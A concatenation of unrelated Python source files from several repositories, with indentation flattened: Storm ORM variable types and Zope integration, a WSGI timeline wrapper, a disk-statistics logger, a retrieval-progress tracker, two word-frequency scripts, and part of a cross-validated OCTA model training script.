self._event_system = None
Variable.__init__(self, *args, **kwargs)
if self.event is not None:
self.event.hook("start-tracking-changes", self._start_tracking)
self.event.hook("object-deleted", self._detect_changes_and_stop)
def _start_tracking(self, obj_info, event_system):
self._event_system = event_system
self.event.hook("stop-tracking-changes", self._stop_tracking)
def _stop_tracking(self, obj_info, event_system):
event_system.unhook("flush", self._detect_changes)
self._event_system = None
def _detect_changes(self, obj_info):
if (self._checkpoint_state is not Undef and
self.get_state() != self._checkpoint_state):
self.event.emit("changed", self, None, self._value, False)
def _detect_changes_and_stop(self, obj_info):
self._detect_changes(obj_info)
if self._event_system is not None:
self._stop_tracking(obj_info, self._event_system)
def get(self, default=None, to_db=False):
if self._event_system is not None:
self._event_system.hook("flush", self._detect_changes)
return super(MutableValueVariable, self).get(default, to_db)
def set(self, value, from_db=False):
if self._event_system is not None:
if isinstance(value, LazyValue):
self._event_system.unhook("flush", self._detect_changes)
else:
self._event_system.hook("flush", self._detect_changes)
super(MutableValueVariable, self).set(value, from_db)
class EncodedValueVariable(MutableValueVariable):
__slots__ = ()
def parse_set(self, value, from_db):
if from_db:
if isinstance(value, buffer):
value = str(value)
return self._loads(value)
else:
return value
def parse_get(self, value, to_db):
if to_db:
return self._dumps(value)
else:
return value
def get_state(self):
return (self._lazy_value, self._dumps(self._value))
def set_state(self, state):
self._lazy_value = state[0]
self._value = self._loads(state[1])
class PickleVariable(EncodedValueVariable):
def _loads(self, value):
return pickle.loads(value)
def _dumps(self, value):
return pickle.dumps(value, -1)
class JSONVariable(EncodedValueVariable):
__slots__ = ()
def __init__(self, *args, **kwargs):
assert json is not None, (
"Neither the json nor the simplejson module was found.")
super(JSONVariable, self).__init__(*args, **kwargs)
def _loads(self, value):
if not isinstance(value, unicode):
raise TypeError(
"Cannot safely assume encoding of byte string %r." % value)
return json.loads(value)
def _dumps(self, value):
# http://www.ietf.org/rfc/rfc4627.txt states that JSON is text-based
# and so we treat it as such here. In other words, this method returns
# unicode and never str.
dump = json.dumps(value, ensure_ascii=False)
if not isinstance(dump, unicode):
# json.dumps() does not always return unicode. See
# http://code.google.com/p/simplejson/issues/detail?id=40 for one
# of many discussions of str/unicode handling in simplejson.
dump = dump.decode("utf-8")
return dump
class ListVariable(MutableValueVariable):
__slots__ = ("_item_factory",)
def __init__(self, item_factory, *args, **kwargs):
self._item_factory = item_factory
MutableValueVariable.__init__(self, *args, **kwargs)
def parse_set(self, value, from_db):
if from_db:
item_factory = self._item_factory
return [item_factory(value=val, from_db=from_db).get()
for val in value]
else:
return value
def parse_get(self, value, to_db):
if to_db:
item_factory = self._item_factory
return [item_factory(value=val, from_db=False) for val in value]
else:
return value
def get_state(self):
return (self._lazy_value, pickle.dumps(self._value, -1))
def set_state(self, state):
self._lazy_value = state[0]
self._value = pickle.loads(state[1])
def _parse_time(time_str):
# TODO Add support for timezones.
colons = time_str.count(":")
if not 1 <= colons <= 2:
raise ValueError("Unknown time format: %r" % time_str)
if colons == 2:
hour, minute, second = time_str.split(":")
else:
hour, minute = time_str.split(":")
second = "0"
if "." in second:
second, microsecond = second.split(".")
second = int(second)
microsecond = int(int(microsecond) * 10 ** (6 - len(microsecond)))
return int(hour), int(minute), second, microsecond
return int(hour), int(minute), int(second), 0
def _parse_date(date_str):
if "-" not in date_str:
raise ValueError("Unknown date format: %r" % date_str)
year, month, day = date_str.split("-")
return int(year), int(month), int(day)
def _parse_interval_table():
table = {}
for units, delta in (
("d day days", timedelta),
("h hour hours", lambda x: timedelta(hours=x)),
("m min minute minutes", lambda x: timedelta(minutes=x)),
("s sec second seconds", lambda x: timedelta(seconds=x)),
("ms millisecond milliseconds", lambda x: timedelta(milliseconds=x)),
("microsecond microseconds", lambda x: timedelta(microseconds=x))
):
for unit in units.split():
table[unit] = delta
return table
_parse_interval_table = _parse_interval_table()
_parse_interval_re = re.compile(r"[\s,]*"
r"([-+]?(?:\d\d?:\d\d?(?::\d\d?)?(?:\.\d+)?"
r"|\d+(?:\.\d+)?))"
r"[\s,]*")
def _parse_interval(interval):
result = timedelta(0)
value = None
for token in _parse_interval_re.split(interval):
if not token:
pass
elif ":" in token:
if value is not None:
result += timedelta(days=value)
value = None
h, m, s, ms = _parse_time(token)
result += timedelta(hours=h, minutes=m, seconds=s, microseconds=ms)
elif value is None:
try:
value = float(token)
except ValueError:
raise ValueError("Expected an interval value rather than "
"%r in interval %r" % (token, interval))
else:
unit = _parse_interval_table.get(token)
if unit is None:
raise ValueError("Unsupported interval unit %r in interval %r"
% (token, interval))
result += unit(value)
value = None
if value is not None:
result += timedelta(seconds=value)
return result
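# Illustrative examples (not part of the original module) of the parsing helpers
# above, based on the formats they accept:
#
#     _parse_date("2011-03-15")          # -> (2011, 3, 15)
#     _parse_time("12:30:45.5")          # -> (12, 30, 45, 500000)
#     _parse_interval("1 day 2:00:00")   # -> timedelta(days=1, hours=2)
#     _parse_interval("90 seconds")      # -> timedelta(seconds=90)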
```
#### File: db/storm/wsgi.py
```python
import functools
import threading
__all__ = ['make_app']
def make_app(app):
"""Capture the per-request timeline object needed for storm tracing.
To use firstly make your app and then wrap it with this make_app::
>>> app, find_timeline = make_app(app)
Then wrap the returned app with the timeline app (or anything that sets
environ['timeline.timeline'])::
>>> app = timeline.wsgi.make_app(app)
Finally install a timeline tracer to capture storm queries::
>>> install_tracer(TimelineTracer(find_timeline))
@return: A wrapped WSGI app and a timeline factory function for use with
TimelineTracer.
"""
timeline_map = threading.local()
def wrapper(environ, start_response):
timeline = environ.get('timeline.timeline')
timeline_map.timeline = timeline
try:
gen = app(environ, start_response)
for bytes in gen:
yield bytes
finally:
del timeline_map.timeline
return wrapper, functools.partial(getattr, timeline_map, 'timeline', None)
```
#### File: storm/zope/zstorm.py
```python
import threading
import weakref
from zope.interface import implements
import transaction
from transaction.interfaces import IDataManager, ISynchronizer
try:
from transaction.interfaces import TransactionFailedError
except ImportError:
from ZODB.POSException import TransactionFailedError
from storm.zope.interfaces import IZStorm, ZStormError
from storm.database import create_database
from storm.store import Store
class ZStorm(object):
"""A utility which integrates Storm with Zope.
Typically, applications will register stores using ZCML similar
to::
<store name='main' uri='sqlite:' />
Application code can then acquire the store by name using code
similar to::
from zope.component import getUtility
from storm.zope.interfaces import IZStorm
store = getUtility(IZStorm).get('main')
"""
implements(IZStorm)
transaction_manager = transaction.manager
_databases = {}
def __init__(self):
self._local = threading.local()
self._default_databases = {}
self._default_uris = {}
def _reset(self):
for name, store in list(self.iterstores()):
self.remove(store)
store.close()
self._local = threading.local()
self._databases.clear()
self._default_databases.clear()
self._default_uris.clear()
@property
def _stores(self):
try:
return self._local.stores
except AttributeError:
stores = weakref.WeakValueDictionary()
return self._local.__dict__.setdefault("stores", stores)
@property
def _named(self):
try:
return self._local.named
except AttributeError:
return self._local.__dict__.setdefault("named", {})
@property
def _name_index(self):
try:
return self._local.name_index
except AttributeError:
return self._local.__dict__.setdefault(
"name_index", weakref.WeakKeyDictionary())
def _get_database(self, uri):
database = self._databases.get(uri)
if database is None:
return self._databases.setdefault(uri, create_database(uri))
return database
def set_default_uri(self, name, default_uri):
"""Set C{default_uri} as the default URI for stores called C{name}."""
self._default_databases[name] = self._get_database(default_uri)
self._default_uris[name] = default_uri
def create(self, name, uri=None):
"""Create a new store called C{name}.
@param uri: Optionally, the URI to use.
@raises ZStormError: Raised if C{uri} is None and no default
URI exists for C{name}. Also raised if a store with
C{name} already exists.
"""
if uri is None:
database = self._default_databases.get(name)
if database is None:
raise ZStormError("Store named '%s' not found" % name)
else:
database = self._get_database(uri)
if name is not None and self._named.get(name) is not None:
raise ZStormError("Store named '%s' already exists" % name)
store = Store(database)
store._register_for_txn = True
store._event.hook(
"register-transaction", register_store_with_transaction,
weakref.ref(self))
self._stores[id(store)] = store
if name is not None:
self._named[name] = store
self._name_index[store] = name
return store
def get(self, name, default_uri=None):
"""Get the store called C{name}, creating it first if necessary.
@param default_uri: Optionally, the URI to use to create a
store called C{name} when one doesn't already exist.
@raises ZStormError: Raised if C{uri} is None and no default
URI exists for C{name}.
"""
store = self._named.get(name)
if not store:
return self.create(name, default_uri)
return store
def remove(self, store):
"""Remove the given store from ZStorm.
This removes any management of the store from ZStorm.
Notice that if the store was used inside the current
transaction, it's probably joined the transaction system as
a resource already, and thus it will commit/rollback when
the transaction system requests so.
This method will unlink the *synchronizer* from the transaction
system, so that once the current transaction is over it won't
link back to it in future transactions.
"""
del self._stores[id(store)]
name = self._name_index[store]
del self._name_index[store]
if name in self._named:
del self._named[name]
# Make sure the store isn't hooked up to future transactions.
store._register_for_txn = False
store._event.unhook(
"register-transaction", register_store_with_transaction,
weakref.ref(self))
def iterstores(self):
"""Iterate C{name, store} 2-tuples."""
# items is explicitly used here, instead of iteritems, to
# avoid the problem where a store is deallocated during
# iteration causing RuntimeError: dictionary changed size
# during iteration.
for store, name in self._name_index.items():
yield name, store
def get_name(self, store):
"""Returns the name for C{store} or None if one isn't available."""
return self._name_index.get(store)
def get_default_uris(self):
"""
Return a list of name, uri tuples that are named as the default
databases for those names.
"""
return self._default_uris.copy()
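# Illustrative sketch (not part of the original module): ZStorm can also be driven
# directly, without ZCML registration.  A hedged example using only the methods
# defined above:
#
#     zstorm = ZStorm()
#     zstorm.set_default_uri("main", "sqlite:")
#     store = zstorm.get("main")         # created on first access from the default URI
#     list(zstorm.iterstores())          # -> [("main", store)]
#     zstorm.remove(store)               # detach the store from ZStorm again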
def register_store_with_transaction(store, zstorm_ref):
zstorm = zstorm_ref()
if zstorm is None:
# zstorm object does not exist any more.
return False
# Check if the store is known. This could indicate a store being
# used outside of its thread.
if id(store) not in zstorm._stores:
raise ZStormError("Store not registered with ZStorm, or registered "
"with another thread.")
data_manager = StoreDataManager(store, zstorm)
zstorm.transaction_manager.get().join(data_manager)
# Unhook the event handler. It will be rehooked for the next transaction.
return False
class StoreDataManager(object):
"""An L{IDataManager} implementation for C{ZStorm}."""
implements(IDataManager)
def __init__(self, store, zstorm):
self._store = store
self._zstorm = zstorm
self.transaction_manager = zstorm.transaction_manager
def abort(self, txn):
try:
self._store.rollback()
finally:
if self._store._register_for_txn:
self._store._event.hook(
"register-transaction", register_store_with_transaction,
weakref.ref(self._zstorm))
def tpc_begin(self, txn):
# Zope's transaction system will call tpc_begin() on all
# managers before calling commit, so flushing here may help
# in cases where there are two stores with changes, and one
# of them will fail. In such cases, flushing earlier will
# ensure that both transactions will be rolled back, instead
# of one committed and one rolled back.
self._store.flush()
def commit(self, txn):
try:
self._store.commit()
finally:
if self._store._register_for_txn:
self._store._event.hook(
"register-transaction", register_store_with_transaction,
weakref.ref(self._zstorm))
def tpc_vote(self, txn):
pass
def tpc_finish(self, txn):
pass
def tpc_abort(self, txn):
pass
def sortKey(self):
return "store_%d" % id(self)
global_zstorm = ZStorm()
try:
from zope.testing.cleanup import addCleanUp
except ImportError:
# We don't have zope.testing installed.
pass
else:
addCleanUp(global_zstorm._reset)
del addCleanUp
```
#### File: PI-slim-napa/recdopt_py/disk_stats.py
```python
import os
import sys
import time
from common.stoppable_thread import StoppableThread
import logging
logger = logging.getLogger('recd')
from mysql import *
# Stat()
# Reads disk statistics from /sys/block/<dev>/stat
# The format of the statistics in that file are as follows:
# Field 1 -- # of reads completed
# This is the total number of reads completed successfully.
# Field 2 -- # of reads merged,
# Reads and writes which are adjacent to each other may be merged for
# efficiency. Thus two 4K reads may become one 8K read before it is
# ultimately handed to the disk, and so it will be counted (and queued)
# as only one I/O. This field lets you know how often this was done.
# Field 3 -- # of sectors read
# This is the total number of sectors read successfully.
# Field 4 -- # of milliseconds spent reading
# This is the total number of milliseconds spent by all reads (as
# measured from __make_request() to end_that_request_last()).
# Field 5 -- # of writes completed
# This is the total number of writes completed successfully.
# Field 6 -- # of writes merged
# Field 7 -- # of sectors written
# This is the total number of sectors written successfully.
# Field 8 -- # of milliseconds spent writing
# This is the total number of milliseconds spent by all writes (as
# measured from __make_request() to end_that_request_last()).
# Field 9 -- # of I/Os currently in progress
# The only field that should go to zero. Incremented as requests are
# given to appropriate struct request_queue and decremented as they finish.
# Field 10 -- # of milliseconds spent doing I/Os
# This field increases so long as field 9 is nonzero.
# Field 11 -- weighted # of milliseconds spent doing I/Os
# This field is incremented at each I/O start, I/O completion, I/O
# merge, or read of these stats by the number of I/Os in progress
# (field 9) times the number of milliseconds spent doing I/O since the
# last update of this field. This can provide an easy measure of both
# I/O completion time and the backlog that may be accumulating.
class Stat(object):
__db_table__ = 'disk_stats'
__db_columns__ = ['device',
'read_complete',
'read_merged',
'read_sectors',
'read_ms',
'write_complete',
'write_merged',
'write_sectors',
'write_ms',
'ios_in_prog',
'io_ms',
'weighted_io_ms',
'read_bytes',
'write_bytes',
'utilization']
READ_COMPLETE = 0
READ_MERGED = 1
READ_SECTORS = 2
READ_MS = 3
WRITE_COMPLETE = 4
WRITE_MERGED = 5
WRITE_SECTORS = 6
WRITE_MS = 7
IOS_IN_PROG = 8
IO_MS = 9
WEIGHTED_IO_MS = 10
def __init__(self,disk):
self.disk = disk
self.disk_ok = os.path.exists('/sys/block/'+disk+'/stat')
self.last = None
self.last_time = None
if not self.disk_ok:
logger.warning('Disk %s does not exist. Ignoring.' % disk)
return
# Find the sector size to determine the number of bytes read/written
self.sector_size = int(file('/sys/block/'+self.disk+'/queue/hw_sector_size','r').read())
logger.info(disk + ': Sector Size is %d bytes.' % self.sector_size)
def called(self):
logger.info(self.disk + ' called')
def update(self):
stat = file('/sys/block/'+self.disk+'/stat','r').read()
cols = stat.split()
read_time = time.time()
# Startup
if self.last is None:
self.last_time = read_time
self.last = cols
return
# Use time difference to account for processing and sleep resolution
diff_time = read_time - self.last_time
# Build a list of differences
self.diff = [ int((int(col)-int(last))/diff_time) for last,col in zip(self.last,cols) ]
# IOs in progress is a queue length so it can go to zero. Do not subtract it
self.diff[Stat.IOS_IN_PROG] = int(cols[Stat.IOS_IN_PROG])
self.last_time = read_time
self.last = cols
def insert(self,options):
vals = []
# Disk Name
vals.append(self.disk)
# The 11 values which are diffed with the previous second
vals.extend(self.diff)
        # Calculated Columns
# read_bytes
vals.append(self.diff[Stat.READ_SECTORS]*self.sector_size)
# write_bytes
vals.append(self.diff[Stat.WRITE_SECTORS]*self.sector_size)
# utilization - max 100%
vals.append('%3.2f' % min((self.diff[Stat.IO_MS]/10.0),100.00))
# Insert into the db
db_insert_into(options,Stat.__db_table__,Stat.__db_columns__,vals)
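# Illustrative sketch (not part of the original module): Stat can be sampled on its
# own, without the MySQL layer, by calling update() twice roughly one second apart
# and reading the per-second differences from .diff.  The device name is only an
# example.
def _example_stat_snapshot(device='sda'):
    stat = Stat(device)
    if not stat.disk_ok:
        return None
    stat.update()   # first call only records the baseline counters
    time.sleep(1)
    stat.update()   # second call fills stat.diff with per-second rates
    return {'read_bytes': stat.diff[Stat.READ_SECTORS] * stat.sector_size,
            'write_bytes': stat.diff[Stat.WRITE_SECTORS] * stat.sector_size}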
class DiskStatsCleaner(StoppableThread):
def __init__(self,options):
super(DiskStatsCleaner, self).__init__()
self.options = options
def clean(self):
# Delete rows where the time is < the history amount
sql_where = "time < DATE_SUB(CURRENT_TIMESTAMP, INTERVAL %d HOUR)" % (self.options.disk_stats_history)
rows_deleted = db_delete_from(self.options,Stat.__db_table__,where=sql_where)
#logger.info("Cleaned: %d" % rows_deleted)
def __run__(self):
logger.info("DiskStatsCleaner Started")
loop = 0
while not self.stopped():
time.sleep(1)
loop+=1
# Check every minute
if loop % 60 == 0:
self.clean()
logger.info("DiskStatsCleaner Stopped")
class DiskStats(StoppableThread):
def __init__(self, options):
super(DiskStats, self).__init__()
self.options = options
self.cleaner = DiskStatsCleaner(options)
def __run__(self):
logger.info("DiskStats Started")
self.cleaner.start()
disks = [Stat(device) for device in self.options.disk_stats_devices]
# Filter out disks we can't track
disks = filter(lambda d: d.disk_ok, disks)
# Exit if no devices to track
        if len(disks) == 0:
logger.warning("No devices to track. Exiting")
self.cleaner.stop()
self.cleaner.join()
return
# Call update one on all first so they can get initial values
for disk in disks: disk.update()
# Break if the user stops
to_sleep = 1
while not self.stopped(timeout=to_sleep):
last = time.time()
# Split up the update from the insert
# This tries to get a snapshot of all the disks at the same time
for disk in disks: disk.update()
for disk in disks: disk.insert(self.options)
# Sleep the shortest amount of time possible so we get updates on the second boundary
to_sleep = 1-(time.time()-last)
if to_sleep < 0: to_sleep = 0
self.cleaner.stop()
self.cleaner.join()
self.cleaner.raise_exception(log=logger)
logger.info("DiskStats has stopped")
# Empty object that you can add fields to.
class Object(object):
pass
if __name__ == "__main__":
# print to stdout
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(name)s: %(funcName)s::%(filename)s:%(lineno)s %(message)s")
streamHandler = logging.StreamHandler()
streamHandler.setFormatter(formatter)
logger.addHandler(streamHandler)
logger.info('DiskStats Unit Testing')
# Fake options for testing
options = Object()
options.dbhostname = 'localhost'
options.dbusername = 'root'
options.dbpassword = '<PASSWORD>'
options.dbname = 'recd'
options.unit_test = False
options.disk_stats_devices = ['sda','sdb','sdc','sdd','sde']
options.disk_stats_history = 48 # hours
ds = DiskStats(options)
ds.start()
# Stop all threads for ctrl-c
while ds.isAlive():
try:
time.sleep(1)
except (KeyboardInterrupt, SystemExit):
break
logger.info('stop')
ds.stop()
logger.info('join')
ds.join()
logger.info('end')
ds.raise_exception(log=logger)
```
#### File: recdopt_py/download_manager/retrieval_progress.py
```python
import sys, time, logging, recdopt_context, ctypes, math
from recdopt_context import *
log = logging.getLogger('recd')
sys.path.append('..')
from common.time_utils import TimeUtils
#
# Base class for file retrieval queries, iterations, steps.
#
class RetrievalProgressBase:
def __init__(self):
self.startSecs = int(0)
self.progress = float(0.0)
self.progressPerc = float(0.0)
def Start(self):
self.startSecs = int(time.time())
self.progress = 0.0
self.progressPerc = 0.0
def SetProgress(self, progress):
        self.progress = progress
self.progressPerc = self.progress * 100.0
def IncrementProgress(self, incremental_progress):
        self.progress += incremental_progress
self.progressPerc = self.progress * 100.0
def Finished(self):
self.progress = 1.0
self.progressPerc = 100.0
#
# One step of a file retrieval query.
# Maintains progress of a single step of a query.
#
class RetrievalProgressStep(RetrievalProgressBase):
def __init__(self, step_index, step_weight):
RetrievalProgressBase.__init__(self)
self.index = int(step_index)
self.indexForGui = int(self.index + 1)
self.weight = step_weight
def IncrementProgress(self, incremental_progress):
RetrievalProgressBase.IncrementProgress(self, incremental_progress)
#log.info("""Incremented step progress by %s, new progress = %s""" % (incremental_progress, self.progress))
#
# One iteration of a file retrieval query, contains a list of steps.
# Maintains progress of a single iteration.
#
class RetrievalProgressIteration(RetrievalProgressBase):
def __init__(self, iter_index, iter_weight):
RetrievalProgressBase.__init__(self)
self.index = iter_index
self.indexForGui = int(self.index + 1)
self.weight = iter_weight
self.numSteps = 4
self.startTime = 0
# Figure out how much each step will contribute to the iteration.
        # NOTE: this equal-weight tally is computed but unused; the fixed weights in step_weight_list below are what actually apply.
total_weighted_steps = 0
for step_index in range(0, self.numSteps, 1):
total_weighted_steps += 1
# Create steps.
step_weight_list = [0.02,0.02,0.06,0.90]
self.stepList = []
for step_index in range(0, self.numSteps, 1):
adjusted_step_index = (self.index * self.numSteps) + step_index
self.stepList.append( RetrievalProgressStep(adjusted_step_index, step_weight_list[step_index]) )
def IncrementProgress(self, incremental_progress):
RetrievalProgressBase.IncrementProgress(self, incremental_progress)
#log.info("""Incremented iteration progress by %s, new progress = %s""" % (incremental_progress, self.progress))
#
# An entire file retrieval query, contains a list of iterations.
# Maintains progress of the entire query.
#
class RetrievalProgress(RetrievalProgressBase):
def __init__(self, time_ranges):
RetrievalProgressBase.__init__(self)
#self.bytes = int(0)
#self.pkts = int(0)
self.numIterations = len(time_ranges)
self.totalSteps = 0
#self.fileName = file_name
self.initial_wall_time = time.time()
self.last_guess = []
self.last_guess.append(0)
self.last_guess_time = []
self.last_guess_time.append(self.initial_wall_time)
# Figure out the total length of the query.
total_secs_in_query = 0
for (start_time, end_time) in time_ranges:
total_secs_in_query += (end_time - start_time)
#log.info("""RetrievalProgress: total_secs_in_query = %s, num_iterations = %s""" % (total_secs_in_query,self.numIterations))
# Create iterations
self.iterationList = []
iter_index = 0
total_weight = 0
iter_weight = 0
for (start_time, end_time) in time_ranges:
num_secs_in_iter = end_time - start_time
if (total_secs_in_query > 0):
iter_weight = float(num_secs_in_iter) / total_secs_in_query
#log.info("""RetrievalProgress: creating interation %s, secs_in_iter = %s, iter_weight = %s""" % (iter_index,num_secs_in_iter,iter_weight))
self.iterationList.append( RetrievalProgressIteration(iter_index, iter_weight) )
self.totalSteps += self.iterationList[iter_index].numSteps
iter_index += 1
total_weight += iter_weight
#log.info("""RetrievalProgress: total_weight = %s""" % (total_weight))
# Update the query progress.
def IncrementProgress(self, incremental_progress):
RetrievalProgressBase.IncrementProgress(self, incremental_progress)
#log.info("""Incremented query progress by %s, new progress = %s""" % (incremental_progress, self.progress))
#self.bytes = int(recdopt.get_written_bytes(ctypes.c_char_p(self.fileName)))
#self.pkts = int(recdopt.get_written_packets(ctypes.c_char_p(self.fileName)))
def time_estimate(self):
current_wall_time = time.time()
seconds_so_far = current_wall_time - self.initial_wall_time
estimated_remaining_seconds = self.last_guess[0]
if seconds_so_far <= 5:
# Wait a few secs to make the first guess.
return "Please wait..."
if self.progress <= 0:
# If no progress yet, can't make a guess.
return "Please wait..."
# Only make a new guess every 5 secs so it doesn't jump around so much.
seconds_since_last_guess = current_wall_time - self.last_guess_time[0]
if seconds_since_last_guess > 5:
# Make a new guess.
estimated_remaining_seconds = int( math.ceil( (seconds_so_far * (1.0 - self.progress)) / self.progress ) )
self.last_guess_time[0] = current_wall_time
self.last_guess[0] = estimated_remaining_seconds
else:
# Just decrement the current guess.
if (estimated_remaining_seconds > seconds_since_last_guess):
estimated_remaining_seconds -= seconds_since_last_guess
else:
estimated_remaining_seconds = 0
self.last_guess[0] = estimated_remaining_seconds
return TimeUtils.time_remaining(estimated_remaining_seconds)
#
# Progress update functions.
# These functions control the RetrievalProgress classes.
#
# Progress is based on how many steps of the total steps in a query
# we have completed and the relative weight of each step.
#
# Progress never goes backwards, only forwards!
# Update the progress of the current step, the iteration it is part of and the entire query.
def IncrementProgressByStepProgress(query, iter, step, current_step_progress):
incremental_step_progress = current_step_progress - step.progress
step.IncrementProgress(incremental_step_progress)
iter.IncrementProgress(incremental_step_progress * step.weight)
query.IncrementProgress(incremental_step_progress * step.weight * iter.weight)
# Increment progress when a step is finished.
def StepFinished(query, iter, step):
additional_step_progress = 1.0 - step.progress
step.Finished()
iter.IncrementProgress(additional_step_progress * step.weight)
query.IncrementProgress(additional_step_progress * step.weight * iter.weight)
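# Illustrative sketch (not part of the original module): a hedged walk-through of the
# progress bookkeeping above, using an arbitrary single-iteration query.
def _example_progress_walkthrough():
    query = RetrievalProgress([(0, 60)])   # one iteration covering 60 seconds
    iteration = query.iterationList[0]     # weight 1.0, with four weighted steps
    step = iteration.stepList[0]           # first step, weight 0.02
    IncrementProgressByStepProgress(query, iteration, step, 0.5)
    # step.progress is now 0.5; iteration and query progress are 0.5 * 0.02 = 0.01
    StepFinished(query, iteration, step)
    # the step is complete, so iteration and query have gained the full 0.02 weight
    return query.progressPerc              # roughly 2.0 (percent)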
``` |
{
"source": "jia-alt/python-test",
"score": 3
} |
#### File: jia-alt/python-test/wf.py
```python
import argparse
import os
import sys
def openFile(filePath):
with open(filePath, "r", encoding="utf-8") as file:
filecontent = file.read()
for replaceChar in '!"#$&()*+,-./:;<=>?@[\\]^_{|}·~“”‘’':
filecontent = filecontent.replace(replaceChar, " ")
return filecontent.lower().split()
def sortAndprint(wordList):
wordDict = {}
for word in wordList:
wordDict[word] = wordDict.get(word, 0) + 1
wordDict_List=list(wordDict.items())
wordDict_List.sort(key=lambda x:x[1],reverse=True)
print("{0:<10}{1}".format('total',len(wordDict_List)),'words')
print('\n')
if(len(wordDict_List) > 10):
for i in range(10):
word,count =wordDict_List[i]
print("{0:<10}{1}".format(word,count))
else:
for i in range(len(wordDict_List)):
word,count =wordDict_List[i]
print("{0:<10}{1}".format(word,count))
return
parser = argparse.ArgumentParser()
parser.add_argument('-s',nargs = '?')
parser.add_argument("filePath", nargs = '?')
args = parser.parse_args()
if ((args.filePath == None) and (args.s == None)):
redi = sys.stdin.read()
for ch in '!"#$&()*+,-./:;<=>?@[\\]^_{|}·~“”‘’':
redi = redi.replace(ch, " ")
txtStr = redi.lower().split()
sortAndprint(txtStr)
pass
elif ((args.s != None) and(os.path.isfile(args.s) == True) and (args.filePath == None)):
#print('File:' + args.s.split('.')[0])
sortAndprint(openFile(args.s))
pass
elif ((args.filePath != None) and (os.path.isdir(args.filePath) == True) and (args.s == None)):
filePathList = os.listdir(args.filePath)
for file in filePathList:
print(file.split('.')[0])
sortAndprint(openFile(args.filePath + '\\' + file))
print("----")
pass
elif ((args.filePath != None) and(os.path.isfile(args.filePath) != True) and (args.s == None) and (os.path.isdir(args.filePath) != True)):
#print('File:' + args.filePath)
args.filePath=args.filePath+".txt"
sortAndprint(openFile(args.filePath))
pass
pass
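# Illustrative usage note (not part of the original script), based on the argument
# handling above; the file and folder names are only examples:
#
#     python wf.py -s article.txt     # word frequencies of a single file
#     python wf.py somebook           # "somebook.txt" is opened automatically
#     python wf.py somefolder         # every file in the folder is summarised
#     python wf.py < article.txt      # with no arguments, stdin is read instead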
``` |
{
"source": "jia-alt/uuu",
"score": 3
} |
#### File: jia-alt/uuu/wf.py
```python
import sys
import getopt
import re
import os
def count_split(str):
    text = re.findall(r'[a-z0-9^-]+', str) # specify the special characters
    # character replacement
    dict = {} # create a dictionary
    for str in text: # iterate over the words in the file
if str in dict.keys():
dict[str] = dict[str] + 1
else:
dict[str] = 1
word_list=sorted(dict.items(), key=lambda x: x[1], reverse=True)
return word_list
def file_read(filename): # open the file
f = open(filename, 'r', -1, 'utf-8')
text = f.read().lower()
word_list = count_split(text)
f.close()
return word_list
def get_words(argv): # perform the corresponding operation based on the command-line arguments
    if len(argv) == 2: # feature 1
try:
list = file_read(argv[-1])
opts, args = getopt.getopt(argv, "sh", ["ifile", "ofile"])
except getopt.GetoptError:
print("test.py -i <inputfile> -o <outputfile>")
sys.exit(2)
for opt, arg in opts:
if opt == "-s":
num = len(list)
print('total',num)
print('\n')
for word in list:
print('{:20s}{:>5d}'.format(word[0], word[1]))
    elif len(argv) == 1: # features 2 and 3
file = argv[-1] + '.txt'
is_file = os.path.exists(file)
if is_file:
list = file_read(file)
if len(list) <=10:
print('total', len(list), 'words')
print('\n')
for item in list:
print('{:20s}{:>5d}'.format(item[0], item[1]))
            else: # more than 10 entries
print('total', len(list), 'words')
print('\n')
for i in range(10):
print('{:20s}{:>5d}'.format(list[i][0], list[i][1]))
else:
if argv[-1] != '-s':
folder_name = argv[-1]
os.chdir(folder_name)
filename_list = os.listdir()
for file_name in filename_list:
print(file_name[:-4])
file_list = [file_name[:-4]]
get_words(file_list)
print('----')
def main(argv):
get_words(argv)
if __name__ == "__main__":
main(sys.argv[1:])
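# Illustrative usage note (not part of the original script), mirroring the three code
# paths in get_words(); the names below are only examples:
#
#     python wf.py -s article.txt   # full frequency list of a single file
#     python wf.py somebook         # top-10 list of "somebook.txt" in the current folder
#     python wf.py somefolder       # per-file top-10 lists for the files in that folder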
``` |
{
"source": "jiaangyao/amd_octa",
"score": 3
} |
#### File: amd_octa/train_single_model_cv/run_training_cv.py
```python
import os
import pathlib
import pickle
import numpy as np
from config.load_config import get_config
from config.config_utils import initialize_config_preproc, initialize_config_split, initialize_config_training
from preproc.preprocess import generate_labels, correct_data_label
from preproc.train_val_test_split import prepare_data_for_train_cv
from modeling.model import get_model, get_callbacks
from save_load.io_funcs import save_cfg, save_csv, save_model, save_mat
from utils.get_patient_id import get_patient_id_by_label
from analysis.plotting import plot_training_loss, plot_training_acc, plot_raw_conf_matrix, plot_norm_conf_matrix
def run_training_cv(vec_Xs, vec_ys, cfg):
vec_history = []
# find the aggregate results on the entire dataset
vec_y_true = []
vec_y_pred = []
vec_y_pred_prob = []
# also declare empty list for the validation set
vec_y_valid_true = []
vec_y_valid_pred = []
vec_y_valid_pred_prob = []
for idx_fold in range(len(vec_Xs)):
print('\n\nFold: {}\n'.format(idx_fold))
Xs = vec_Xs[idx_fold]
ys = vec_ys[idx_fold]
print("\nx_train Angiography cube shape: {}".format(Xs[0][0].shape))
print("x_train Structure OCT cube shape: {}".format(Xs[0][1].shape))
print("x_train B scan shape: {}".format(Xs[0][2].shape))
print("x_train 3D B scan shape: {}".format(Xs[0][3].shape))
print("y_train onehot shape: {}".format(ys[0].shape))
print("\nx_valid Angiography cube shape: {}".format(Xs[1][0].shape))
print("x_valid Structure OCT cube shape: {}".format(Xs[1][1].shape))
print("x_valid B scan shape: {}".format(Xs[1][2].shape))
print("x_valid 3D B scan shape: {}".format(Xs[1][3].shape))
print("y_valid onehot shape: {}".format(ys[1].shape))
print("\nx_test Angiography cube shape: {}".format(Xs[2][0].shape))
print("x_test Structure OCT cube shape: {}".format(Xs[2][1].shape))
print("x_test B scan shape: {}".format(Xs[2][2].shape))
print("x_test 3D B scan shape: {}".format(Xs[2][3].shape))
print("y_test onehot shape: {}".format(ys[2].shape))
# Get and train model
model_curr = get_model(cfg.str_arch, cfg)
callbacks_curr = get_callbacks(cfg)
h = model_curr.fit(Xs[0], ys[0], batch_size=cfg.batch_size, epochs=cfg.n_epoch, verbose=2,
callbacks=callbacks_curr,
validation_data=(Xs[1], ys[1]), shuffle=False, validation_batch_size=Xs[1][0].shape[0])
vec_history.append(h.history)
# save trained models
save_model(model_curr, cfg, overwrite=True, save_format='tf', idx_cv_fold=idx_fold)
# plotting training history
plot_training_loss(h, cfg, save=True)
